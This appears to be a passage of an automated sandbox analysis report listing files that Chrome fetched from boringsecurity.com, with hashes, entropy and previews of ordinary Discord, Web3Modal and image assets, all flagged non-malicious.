                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["3726"],{331543:function(t,e,r){"use strict";r("854508"),r("70102");var i=r("464510"),n=r("765379"),o=r("667769"),a=r("640107"),s=r("554741"),f=r("903389"),c=r("862440"),h=r("338100"),u=r("955006"),d=r("812095"),l=r("264871"),p=Object("a"),b="a"!==p[0]||!(0 in p),m=d("String.prototype.split");t.exports=function(t){var e,r=h(this),d=c((b&&l(r)?m(r,""):r).length);if(!f(t))throw TypeError("Array.prototype.map callback must be a function");arguments.length>1&&(e=arguments[1]);for(var p=i(r,d),g=0;g<d;){var y=u(g);if(s(r,y)){var v=n(t,e,[a(r,y),g,r]);o(p,y,v)}g+=1}return p}},738838:function(t,e,r){"use strict";var i=r("366400"),n=r("648352"),o=r("812095"),a=r("331543"),s=r("16662"),f=s(),c=r("60426"),h=o("Array.prototype.slice"),u=function(t,e){return n(t),f.apply(t,h(arguments,1))};i(u,{getPolyfill:s,implementation:a,shim:c}),t.exports=u},16662:function(t,e,r){"use strict";var i=r("845968"),n=r("331543");t.exports=funct
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:downloaded
                                                                          Size (bytes):1150
                                                                          Entropy (8bit):4.106811797800129
                                                                          Encrypted:false
                                                                          SSDEEP:24:tYmJuVoGLt3pyWHd12sVVyFhvaSOTP8O0f8bj:DEt3QW91jVChCSOQVq
                                                                          MD5:B84A7FB6BFA0C7E01706CA53B0CF84EC
                                                                          SHA1:A3A7CD7AD059F64F103E888EE500BB474BFB0AC4
                                                                          SHA-256:061565F5EDDFD4FEA975BB3F51D57761AE17449E77359578768304F8E9DF53EE
                                                                          SHA-512:B3598B4EFD5026E31B3996C1279F620FEDD4D700819792F3659A4A275B6A3486ED9FD5F4561138987D630403276191A900206103256D3F1C3927302184642F5A
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boringsecurity.com/images/twitter_dark.svg
                                                                          Preview:<svg width="24" height="20" viewBox="0 0 24 20" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M24 2.66563C23.0997 3.05681 22.1472 3.31452 21.1725 3.43063C22.1968 2.83082 22.9672 1.87792 23.339 0.750633C22.3705 1.31693 21.3128 1.71427 20.211 1.92563C19.747 1.4394 19.1891 1.05259 18.571 0.788706C17.9529 0.524826 17.2876 0.389391 16.6155 0.390633C13.8945 0.390633 11.6925 2.56063 11.6925 5.23563C11.6906 5.60772 11.7332 5.97869 11.8195 6.34063C9.86834 6.24916 7.95776 5.75142 6.20999 4.87926C4.46222 4.0071 2.91574 2.77971 1.6695 1.27563C1.23229 2.01269 1.00107 2.85365 1 3.71063C1 5.39063 1.8765 6.87563 3.2 7.74563C2.41586 7.72702 1.6478 7.51948 0.961 7.14063V7.20063C0.961 9.55063 2.661 11.5056 4.911 11.9506C4.48789 12.0634 4.05188 12.1206 3.614 12.1206C3.30329 12.1212 2.99328 12.091 2.6885 12.0306C3.314 13.9556 5.1345 15.3556 7.291 15.3956C5.53869 16.7461 3.38731 17.476 1.175 17.4706C0.782309 17.47 0.389983 17.4467 0 17.4006C2.25059 18.8377 4.86672 19.5979 7.537 19.5906C16.605 19.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):472128
                                                                          Entropy (8bit):5.847988920111608
                                                                          Encrypted:false
                                                                          SSDEEP:6144:mBtopnpGCkbXyZyaIlMmW9iQOWtBMMlenYhqYmB9RFK29iJPM5wQcbF1tAgtrdZn:3pnMCkeZyBik8bF1tAgtrdZ0l3NI3
                                                                          MD5:D50ECFB25F892352F32327437A53C7F2
                                                                          SHA1:F115A5CF891438621CF361ACE5E82A854EA49D96
                                                                          SHA-256:A7EC590BFCA3C91F90E08D355BFB28D1C8CB56264949D947561E3180F157DE8B
                                                                          SHA-512:C67BCBF152AFE3FDEEEEEE92B0B91BA14C2F3ECE9D61F07DD22832CD56C8DB2CC4CDA793D405CF7A8FD297810C76CCA7FB4A1A9E0B4000BC602D774D58CA4896
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/7273.c6fee0df510188855fd0.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["7273"],{49111:function(_,E,R){"use strict";R.r(E),R.d(E,{ChannelTypes:function(){return IF.ChannelTypes},MessageTypes:function(){return Iv.MessageTypes},ChannelTypesSets:function(){return IF.ChannelTypesSets},MessageEmbedTypes:function(){return IW.MessageEmbedTypes},SubscriptionTypes:function(){return IZ.SubscriptionTypes},LoginStates:function(){return a},LoginMethods:function(){return I},RegistrationStates:function(){return e},FormStates:function(){return A},KeybindActions:function(){return o},GlobalKeybindActions:function(){return t},RecentMentionsFilters:function(){return T},RTCDebugSections:function(){return r},GuildSettingsSections:function(){return N},GuildSettingsSubsections:function(){return O},ChannelSettingsSections:function(){return i},ChannelSettingsSubsections:function(){return L},ChannelSections:function(){return c},FriendsSections:function(){return n},DesktopNotificationTypes:function(){return S},Not
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):994569
                                                                          Entropy (8bit):5.761190995412591
                                                                          Encrypted:false
                                                                          SSDEEP:12288:0fZb+aRfG0AtVGpYIIa3mNfGIX3D9OJiXU:q7EVGpJ13mNfG258
                                                                          MD5:71A05689B9A07B271E7CE62B3DBA01C1
                                                                          SHA1:5CECE01AB6DE6E498CAC7C4E448A37EFAEA7D42F
                                                                          SHA-256:31240B2A314180BADAB441A9D4C5B8E41A756F56F7CF696B9418B5D3A0CFC0C3
                                                                          SHA-512:78A8B7ACB1943EFC27434C88519AB9714336B4726E754DC1235194C59B0F68B8C4DB3306CAC93C05472C1441650903B0B0382A5911E5306C76D5B5993EA16112
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/65573.3d56d56002765d7a9da8.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["65573"],{798526:function(e,t,n){"use strict";n.r(t),n.d(t,{popperGenerator:function(){return p}}),n("424973");var r=n("114716"),a=n("31644"),o=n("403468"),i=n("986257"),s=n("394442"),u=n("683857"),l=n("914997"),c=n("753671"),d={placement:"bottom",modifiers:[],strategy:"absolute"};function f(){for(var e=arguments.length,t=Array(e),n=0;n<e;n++)t[n]=arguments[n];return!t.some(function(e){return!(e&&"function"==typeof e.getBoundingClientRect)})}function p(e){void 0===e&&(e={});var t=e,n=t.defaultModifiers,p=void 0===n?[]:n,m=t.defaultOptions,h=void 0===m?d:m;return function(e,t,n){void 0===n&&(n=h);var m={placement:"bottom",orderedModifiers:[],options:Object.assign({},d,h),modifiersData:{},elements:{reference:e,popper:t},attributes:{},styles:{}},_=[],y=!1,g={state:m,setOptions:function(n){var r="function"==typeof n?n(m.options):n;v(),m.options=Object.assign({},h,m.options,r),m.scrollParents={reference:(0,c.isElement)(e
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JSON data
                                                                          Category:downloaded
                                                                          Size (bytes):986
                                                                          Entropy (8bit):5.442167159095882
                                                                          Encrypted:false
                                                                          SSDEEP:24:Y7NceoX4fb5SEx3/c4qnzeKAnMbD8SMPNc9inqfFJRCCApk7rm7k:Y7cib5SEx3KeFnMkSikGmJRCDpkfEk
                                                                          MD5:21ACE11DE682D67055E9AA554B9A98DA
                                                                          SHA1:2111068AB697335EAEF0F396B395D7CD4AEBE87C
                                                                          SHA-256:3EBEE99F9514565BFD16D28FD0F6A0EC10831D5D5D267B09C50414749238BE4F
                                                                          SHA-512:45F6591070E6436192825AC4AA6296C2504640D60D6256C0B20B142337276D4235184FD953824277118B6C6EDC3611B326D87519E319EDD8B5F080C2F155D5EF
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/api/v9/invites/boringsecurity?with_counts=true&with_expiration=true
                                                                          Preview:{"type":0,"code":"boringsecurity","expires_at":null,"flags":2,"guild":{"id":"933253328794689546","name":"Boring Security","splash":null,"banner":null,"description":null,"icon":"9b0ad1a7a2c911684a0e7e6e1e7bce2e","features":["GUILD_ONBOARDING","ROLE_ICONS","SEVEN_DAY_THREAD_ARCHIVE","COMMUNITY","INVITE_SPLASH","CREATOR_ACCEPTED_NEW_TERMS","MEMBER_PROFILES","ANIMATED_BANNER","VANITY_URL","CREATOR_MONETIZABLE_PROVISIONAL","GUILD_ONBOARDING_EVER_ENABLED","BANNER","PRIVATE_THREADS","GUILD_ONBOARDING_HAS_PROMPTS","SOUNDBOARD","TEXT_IN_VOICE_ENABLED","NEWS","CHANNEL_ICON_EMOJIS_GENERATED","ANIMATED_ICON","WELCOME_SCREEN_ENABLED","THREE_DAY_THREAD_ARCHIVE","AUTO_MODERATION"],"verification_level":2,"vanity_url_code":"boringsecurity","nsfw_level":0,"nsfw":false,"premium_subscription_count":24},"guild_id":"933253328794689546","channel":{"id":"933259185032925204","type":0,"name":"\ufe31\ud83e\udde2\ufe31change-roles"},"approximate_member_count":6598,"approximate_presence_count":1438}.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):30610
                                                                          Entropy (8bit):7.986682663164426
                                                                          Encrypted:false
                                                                          SSDEEP:768:wo4lu7AYwOEjJ/BSbkr+YxI9UDFi8h0oF+Tjmhy:wRlZYOBk4GCkoF+/mQ
                                                                          MD5:056AAB3CD80E061AAF99363A0A12C874
                                                                          SHA1:37BACEC2DB08DB55F7746B0820E25023348EB8E4
                                                                          SHA-256:0505584AD8AD9CF557B30779CC35234625C14229C7ED86AA897CC33280B9D2EA
                                                                          SHA-512:40A417BFFDE9CC2BEA69ABA8FBC9C3D291A76FB44706F3F5DC5ED166E40D29B9E205AD30A20028E70D079CEE9B7840E1B915EB2BF14F458B321198DDB0BD9FE3
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR................M....pHYs............... .IDATx...xUW.S.K.".w..www..'..b..w/.PJK....@Kqww.N.3S...=!.v......2..<.9W.7..=...^k.#q..~..2.D......vM.Z....t.F....;\~...*~<.......3#.s.....@....%.t...x..R..tc........%....a.!......q......[..n.6.=4.NB..o....A.\.........+......>.^....-N.J.T.$...6..p.....'..z.p..+..._..<=1....E..l.F...W..'(.)....._.....{1c...I....lP.}.a.\..>x.)a/.X..0...._..~....O..0l...?.....l....b...7.....C..k..+...$...j....N...6....$...j....N...6....$...j....N...6......<.........q5..........=...v.nt.q.......v......'.7......G}...r..Z+.VZpx..7..y....N7...A..r.7.d...q.G*%..v.;7..X.bD.........Dgb$...Y.d.v'...........W....e.....gp\iw.V..W..)p5cNB.....k.....\..B.1.!..=eV<..)t....4.;../..c.y...]n<.u.N.+.>.,.Kakn;M.....ez`".].x..P......~"k.TYr......9`..\.......a.~..~f>.v...(m.....LSZ2.y1..6.Z..IKNd..................f(.~....2.C.!.m..-.....3....n.._.3.'.^.....u.7Kr.q.%.J..3+Y.<...'...Htq!....U5...8..iY.%%1.3.W.-y..i}Z..5..p
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65519), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):96882
                                                                          Entropy (8bit):5.612239730009627
                                                                          Encrypted:false
                                                                          SSDEEP:1536:2O6ZONBf1vb/w3gmYnv+Rjjuauc8QsTGk5/iL:AERjv2jjpsr/iL
                                                                          MD5:6059F93445C1FBBBF2A3962A98E83DDA
                                                                          SHA1:419BCD6C4D8D196758A946AEE56E82877F1A6013
                                                                          SHA-256:407F1B1E3A2DD644CEE4C4CD727ABA5572CC044C34786FD1193A41F72CC1A5BE
                                                                          SHA-512:0C05CF4F48C115E37BA52E2597FB3EFDE093A987691119E9916EDE2C1B570B06F366BB71F88048E980A8AED299B6EFAEC56570DF5429A506A4762C16C967CB1F
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/5593.7ea5e2c9f604c23670f3.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["5593"],{203472:function(e,t,n){"use strict";e.exports=n.p+"72eaa596042042be6259.svg"},249712:function(e,t,n){"use strict";e.exports=n.p+"1c04c4fae98fbfc21d22.svg"},144261:function(e,t,n){"use strict";e.exports=n.p+"14223d22c9628be36fc0.svg"},519772:function(e,t,n){"use strict";e.exports=n.p+"14223d22c9628be36fc0.svg"},588281:function(e,t,n){"use strict";e.exports=n.p+"e79ff570861bbb9679f5.svg"},242412:function(e,t,n){"use strict";e.exports=n.p+"29306de8953471954035.svg"},729861:function(e,t,n){"use strict";e.exports=n.p+"bc35d12450c07bd37714.svg"},629109:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return C}});var a=n("913144"),r=n("504385"),s=n("439141"),i=n("533222"),l=n("42887"),u=n("599110"),o=n("709681"),d=n("12307"),c=n("49111"),f=n("353927");function E(){(0,o.playSound)("mention3")}function h(e,t,n,a,r){if(t===n)return;let s=e[t],l=e[n];u.default.track(c.AnalyticEvents.MEDIA_DEVICE_CHANGED,{
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):93885
                                                                          Entropy (8bit):5.560888552895792
                                                                          Encrypted:false
                                                                          SSDEEP:1536:TsmwTvTVkEG8/lsod/J2wUhTmNud6BGI+SIQ92fYfKmM6QZn:3wTrJ50ABGQimM6Q5
                                                                          MD5:A6882BC9FE6F58E075B6705DA6C72138
                                                                          SHA1:2158AA528AF44D0657D68F6ECCB5C476B78014A7
                                                                          SHA-256:565D6DDB8EE0CF661481030527B3A3F672199FE15EBBCD16CB91B2BBF33906A0
                                                                          SHA-512:0EC14F7ACABA6408149DF6CFFD09C6701AE13EACF12B9E77CEF0CDF188247B6B1F62C622805E90F2778BFF4563177716BA004A367FFCA6206100DEF8D7CDA0FA
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/15671.93a88de2d317d307d268.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["15671"],{527826:function(e,t,n){"use strict";e.exports=n.p+"adf75861421c2a6a6269.png"},97595:function(e,t,n){"use strict";e.exports=n.p+"79b6525428d203d4dc7a.svg"},251834:function(e,t,n){"use strict";e.exports=n.p+"559d26c8222b2691e986.svg"},800573:function(e,t,n){"use strict";e.exports=n.p+"4db33740afa8c892ed27.svg"},41668:function(e,t,n){"use strict";e.exports=n.p+"1ed67ff58fdb5a109fc8.svg"},660389:function(e,t,n){"use strict";e.exports=n.p+"6e27695fd61b8fa1ebde.svg"},212509:function(e,t,n){"use strict";e.exports=n.p+"deabad3453b517c8cb7f.png"},494323:function(e,t,n){"use strict";e.exports=n.p+"bd6a8da80056942f263e.svg"},556659:function(e,t,n){"use strict";e.exports=n.p+"dad1a596835f9bb1024d.svg"},787762:function(e,t,n){"use strict";e.exports=n.p+"4396f31050743192914e.svg"},508971:function(e,t,n){"use strict";e.exports=n.p+"a7d2c7ff9cdc7b4b1d04.svg"},250790:function(e,t,n){"use strict";n.r(t),n.d(t,{default:funct
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:dropped
                                                                          Size (bytes):4142
                                                                          Entropy (8bit):4.213667731461687
                                                                          Encrypted:false
                                                                          SSDEEP:96:WYwvNCHI0IdGH7kucCQ4mHjTv13NMJVYkspCFnQPlfDGE:WYwvQ6A05X1OJoCFnUlfDGE
                                                                          MD5:FADF528FF8547BE361E337F467742E63
                                                                          SHA1:A5D4410B0F8B8169D41B708FA532DCCFCF2A02EC
                                                                          SHA-256:9E616AF20BEF0AA477C593F6CC1CBE058774002F4261D3B59DD5541A05EC0911
                                                                          SHA-512:41F9CE615B720A9C85E1C210FB97FE1B1B3B473BEDAD5557B4E27B742A40ABBD57636E0601BF207A82DD14EBC9C09F0768DFDE79D3160FCE43CF7C3E15BDDCB9
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:<svg height="445.04544mm" viewBox="0 0 218.75303 44.504544" width="2187.5303mm" xmlns="http://www.w3.org/2000/svg"><g stroke-width=".264583" transform="translate(-62.63352 -53.603079)"><path d="m132.35681 95.00695-5.1816-15.951199c4.3688-1.6256 6.7564-5.3848 7.4168-9.6012 1.6256-10.1092-4.4704-12.7508-13.462-12.7508h-10.0076l-6.0452 38.303199h10.3632l1.6256-10.210799c.3048-1.8796.4572-3.7592.7112-5.6388l.1524-.1016 3.2004 15.951199zm-13.6652-20.624799 1.524-9.4488c2.8448-.1524 4.6736 1.27 4.1148 4.6228-.4064 2.4892-2.2352 4.8768-4.9784 4.8768z"/><path d="m135.73581 95.00695h19.2532l1.4224-9.042399h-8.89l.9144-5.842h7.9756l1.4224-9.0424h-7.9756l.8636-5.334h8.89l1.4224-9.0424h-19.2532z"/><path d="m177.34339 95.00695 16.4592-38.303199h-11.2268l-5.334 15.748c-1.016 3.0988-1.6764 6.1468-2.6416 9.2456h-.1016c.1016-3.0988.3556-6.1468.3556-9.2456l.0508-15.748h-10.8712l2.7432 38.303199z"/><path d="m192.68181 75.855351c-1.524 9.3472.9652 19.811999 11.4808 19.811999s16.256-10.464799 17.78-19.8119
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 400x400, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                          Category:downloaded
                                                                          Size (bytes):2762
                                                                          Entropy (8bit):7.905538339488797
                                                                          Encrypted:false
                                                                          SSDEEP:48:PqEAmhhb/3X43qYxmhHLcDhhNs1GOo1sgheEcZxOljG6xYEnKkRxpCUdAVx9I:PqE5l/WBxmhHLcDfNstoigs1vsjHYEKJ
                                                                          MD5:F5C89FF82DEE2A99C7FD3D8C2572CADB
                                                                          SHA1:F508F5771E1D44C1B018F9B76C0059BFAF661CFB
                                                                          SHA-256:CB9FB4000086474F84DCAE9A54DD2862D09878BC505F1D4B5525755A5723ECA9
                                                                          SHA-512:31523082B65F5B547AB82B5DD5D73D2F071E290FEAE31EC75EA17C6B782C11CA1D7BB8DEB52F95E835238633815A5A0873BAEB230A81370093CF389D97EDE1D5
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://explorer-api.walletconnect.com/w3m/v1/getWalletImage/73f6f52f-7862-49e7-bb85-ba93ab72cc00?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1
                                                                          Preview:RIFF....WEBPVP8 .....N...*....>I$.F".!.#.x(P..gn.@.....u..Z........D...G.s...z......._.........g.O...<..B......./..../.....@=.<.?...|..............z..b....C.C.6....]..e...y~....q.,......l.(.Z...e..S..,.}jb.....LV........P>.1[....+`Y@...l.(.Z...e..S.. 5;......0.-zVExW..b.....:g.....nh.t3.!... ..S..-..+`Y..b..m.......Zq..@....A.].%...x.Q.....d..P>....K1:?i.#..|.....l.(.Z..6..t..........$.r.....t..1..|./.6Z.#.-;..v{y..U@.z.P.L..V..T\1^....b.....K.....U..2R..5l."b....g....p,./;.<..n....S....d..X.Q..a.......V...^..G..vH.dc{8KS^(>=j\;.g...W.)-.|.......)...J..,.CU`,.}jd.8..'a+A.....P>.1[....+`Y@...l.(.Z...e..S..,.}jb.....LV........P......w.7S.x.<.S.........wN..........8.....k#P...D...].O...:..kEuL9...~..7......Jr...7.I...mH.}..L.h.#........-...d.C..9..........l.F..zqv.}.K.>.%..C...7...w.xm,..CX..&.l..w9.~...Kh*.`.1&.8.g{....IZ. ...N.........o..#Z8F.....;.r..C./.......z.*V..X.....dc.9.....p....fJo-.$.k.....1.....u4Q}....erCB.=......z..e.n.o7Z.s!.H%.k.\.<yL
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (15862)
                                                                          Category:downloaded
                                                                          Size (bytes):15907
                                                                          Entropy (8bit):5.345048480744981
                                                                          Encrypted:false
                                                                          SSDEEP:384:TbCB2iKM7URdNOjqBsEuxZfQWE0BCOX5QUbc1lwNWUXTf5pVI:TbCB2iKM7URHOjqB3aZfQWE0EOlKloF6
                                                                          MD5:79BE49AA3DF19552F9E4E10C6290C92C
                                                                          SHA1:100DF76A754CFB889B93839ED7F65B47B1CB6C2C
                                                                          SHA-256:8E35DF47572AF24FE594561A7FEA5958E0499D499979D6F904FDAACF1F0D6DFD
                                                                          SHA-512:6DF356207BC2B89EAB3186DAC97DDE3C4591B38E2F572743E15E1D0FBAC317D216C241F8F7EF8D2ED28F61C8B63AD07C19522550E17017CBEFE1D06FE69F135E
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://unpkg.com/@web3modal/html@2.7.1/dist/cdn/bundle-7a116c93.js
                                                                          Preview:const ye=Symbol(),ae=Object.getPrototypeOf,ee=new WeakMap,we=e=>e&&(ee.has(e)?ee.get(e):ae(e)===Object.prototype||ae(e)===Array.prototype),Ie=e=>we(e)&&e[ye]||null,ie=(e,t=!0)=>{ee.set(e,t)},Q=e=>typeof e=="object"&&e!==null,R=new WeakMap,F=new WeakSet,Ee=(e=Object.is,t=(r,E)=>new Proxy(r,E),s=r=>Q(r)&&!F.has(r)&&(Array.isArray(r)||!(Symbol.iterator in r))&&!(r instanceof WeakMap)&&!(r instanceof WeakSet)&&!(r instanceof Error)&&!(r instanceof Number)&&!(r instanceof Date)&&!(r instanceof String)&&!(r instanceof RegExp)&&!(r instanceof ArrayBuffer),n=r=>r.configurable&&r.enumerable&&r.writable,l=r=>{switch(r.status){case"fulfilled":return r.value;case"rejected":throw r.reason;default:throw r}},u=new WeakMap,f=(r,E,S=l)=>{const C=u.get(r);if(C?.[0]===E)return C[1];const L=Array.isArray(r)?[]:Object.create(Object.getPrototypeOf(r));return ie(L,!0),u.set(r,[E,L]),Reflect.ownKeys(r).forEach($=>{if(Object.getOwnPropertyDescriptor(L,$))return;const M=Reflect.get(r,$),_={value:M,enumerable:!0
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, progressive, precision 8, 2047x859, components 3
                                                                          Category:downloaded
                                                                          Size (bytes):232425
                                                                          Entropy (8bit):7.986852076558832
                                                                          Encrypted:false
                                                                          SSDEEP:6144:ylH1TLO0gslntQPGiLk+t+AZWgCrZhSe8q:yt1fNptspxHT2Ee/
                                                                          MD5:ACABCBC9305D2204B6AC96FF83B21BAE
                                                                          SHA1:7F9E2B31F67641EF79D748CEAF7C38C98A05EC23
                                                                          SHA-256:E39E98B31AA1763CAE81119AC5EB6F993136675D7E864FA306D0F8F1B4F0C098
                                                                          SHA-512:185DAA895FCEC4FF635A6F6BCF005116729E62D0EB11AB610E3D2C665D4EF8E19914C9AFB133AA9AAF0F6B2C2F50CFCA1846E111EE2B061EC0FF8E6ACF8FB239
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:"https://boringsecurity.com/_ipx/w_2048,q_75/%2Fimages%2Fbanner.jpeg?url=%2Fimages%2Fbanner.jpeg&w=2048&q=75"
                                                                          Preview:.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......[...."..............................................................................z&........+rr..AM...X.. . .<...T..Q..P.....l%.H...(.....B....2....2..F.......CT0,..$Y.AT.#jp....Qt.2a.......B.,Y".l.7D....&[[&@.".*$.i..8.....Dl.a..Y6..."lTI...BY&J)....Ja.9....,I....E..F...w).*$.I...$.....%)$..CdatR.........+"H+.K..K....$[tB..aJ.n 0.D....F.TT....)Ds.RjLJh....B...P.....J&..v..U.).*n2....R..%.6.:.Ik .)*. .g.LtBq.P..8L..V2.X.*`"A..5.B.%8.P...vVI1...RcT.&.h..,,v.p..I"....6.3..."...$..B.Th..ic8....0.I,R%@.....j.j....I.....+.v[.F$)+i..m29....40dF...IK.....eF.A.$..lP..&E..BJ2e). %.D'.X.K..Z...!. &0`V.%VWq..N....QH....Q..!..I...lT0.L..S.E....@.FH..;RA*..D...c.9Td.`k..wZ...J"5`..BpA....J2..'....J2.......L.;$........F.b.X..u% .!."1,i....'.`4.k....H.I0k.7..]...j.,D1P.)!5$.jQ......3....%$.(....Z..6P..J4.p...W..`&..`i.\.6$F.....j
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Java source, ASCII text
                                                                          Category:downloaded
                                                                          Size (bytes):100
                                                                          Entropy (8bit):5.075015851058509
                                                                          Encrypted:false
                                                                          SSDEEP:3:JSFLLVAv0d1VMNFE0adwRj/YprLI4b:Aq8bAaeRM+4b
                                                                          MD5:4C3390F39D6ABBA7FCAAAD42EF38043F
                                                                          SHA1:5035BB30A9376635B64C5A103AA4F9AC0F2DC830
                                                                          SHA-256:D82D54A2E91A15BF856F151142448904804A557A0AF6F629B4D14BFF3777E062
                                                                          SHA-512:4F22D3E823928FFA45AAD2109AF52B645FBC38D4791826F7A551FEB603766F5DF83CBA78CE53FBA39B9461DD75B9EDD60FBF518BB60EB81C5F1E559007186F87
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://unpkg.com/@web3modal/html@2.7.1/dist/cdn/bundle.js
                                                                          Preview:import{W as e}from"./bundle-7a116c93.js";export{e as Web3Modal};.//# sourceMappingURL=bundle.js.map.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):74598
                                                                          Entropy (8bit):5.767780196791083
                                                                          Encrypted:false
                                                                          SSDEEP:1536:GHvNomsacUEPApiu3j4VszG5FyJ1+l1Jqg:wvqmsacWpiu3kVszqF41a/H
                                                                          MD5:9F8C0B255A043F4864582D789EFEB32C
                                                                          SHA1:0601B7C9E69903D25A0475ED4BE430D830AB0852
                                                                          SHA-256:CFAC1754CD8372B14C4B120E3B56526AD73223D793CF932DC6F510430196CF6D
                                                                          SHA-512:8535D915A180E0C0D2C94CCE5A58A1719579C6CF326C9A7CB2E4F553C5B0118883D4444212259D7585B4F85DD6EF3AEB2D8091B36672ECBEE09C1010425871C3
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/44504.4d34e216cd6b9c5f65cb.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["44504"],{395243:function(e,t,s){"use strict";e.exports=s.p+"02716fc5eadc622176ec.svg"},847768:function(e,t,s){"use strict";e.exports=s.p+"7a513380b29b08761944.svg"},556203:function(e,t,s){"use strict";e.exports=s.p+"265b73f8a977d608ce6d.svg"},14696:function(e,t,s){"use strict";e.exports=s.p+"4379bb6f4a0b6aef4c6e.svg"},923313:function(e,t,s){"use strict";e.exports=s.p+"900bcaf53baf2576f2e4.svg"},455037:function(e,t,s){"use strict";e.exports=s.p+"f2e0654d66b8b8e6a94f.svg"},626839:function(e,t,s){"use strict";e.exports=s.p+"d4dd118fbb46696c4b53.svg"},353962:function(e,t,s){"use strict";e.exports=s.p+"d619655b15293074d742.svg"},29887:function(e,t,s){"use strict";e.exports=s.p+"679cef38d2928bbc10e5.svg"},311908:function(e,t,s){"use strict";e.exports=s.p+"9af61b18ad6cd164dbb5.svg"},429300:function(e,t,s){"use strict";e.exports=s.p+"010fced8ed1844b9f9dd.svg"},949004:function(e,t,s){"use strict";e.exports=s.p+"2c946c5f3df4
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, baseline, precision 8, 400x400, components 3
                                                                          Category:dropped
                                                                          Size (bytes):8503
                                                                          Entropy (8bit):7.561020634146592
                                                                          Encrypted:false
                                                                          SSDEEP:192:blJgpuGs222cL5ZpVuHFANIHc6vnlW91FJlpYYR2nEcIaQ:M0z221thTrklW5LpLRQEL
                                                                          MD5:0E90098FAF314C47A708D28660B63D14
                                                                          SHA1:0028D365567813E6BB41DF3F7AAA6287D85D5A0C
                                                                          SHA-256:5D4F1859F8226283DD3E4724DD8AF525201ADBD9798C3280C427884DA1398D40
                                                                          SHA-512:9DEDC463B6606642CDABBBFFE571DCDF28963EAB0F6C25021C87F36A0EB8B2E7480B9C30C785E5F931C3F20ACA0E237B3429A7233DD5DF9829E0470F4DAA2113
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((..........."........................................@..........................!.1AQ."a.q.#2BRbs......&6.34Sr.$....................................2.........................!1..A."Qaq.2.....#.$4RB............?.............................................................................................................................|...jv..p...o.....d|L.x.........2Fd..."..".Uf6.O..j...............................................~....V.Z/]..."U[&..G..IM...Y[R..qk..E.y8o.fQ|J9-..:....n......1.......'..i.j......:7u8......*..@....................................".r.........B.8.9/5..2.G......V..o..-ZR|.{........l...f..>..0......n.;G....e..eM.|..;>m.u.:0O.c..fi.....\.x{?V.W..2k|....k&9.y....ci.@.b.....................................a.....V.....UQr.o..D.v........,.Z.X....x....x..p.....;w...9giQ..s|.f..s&..F.(W)..Lq.G......V....
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65510), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):88641
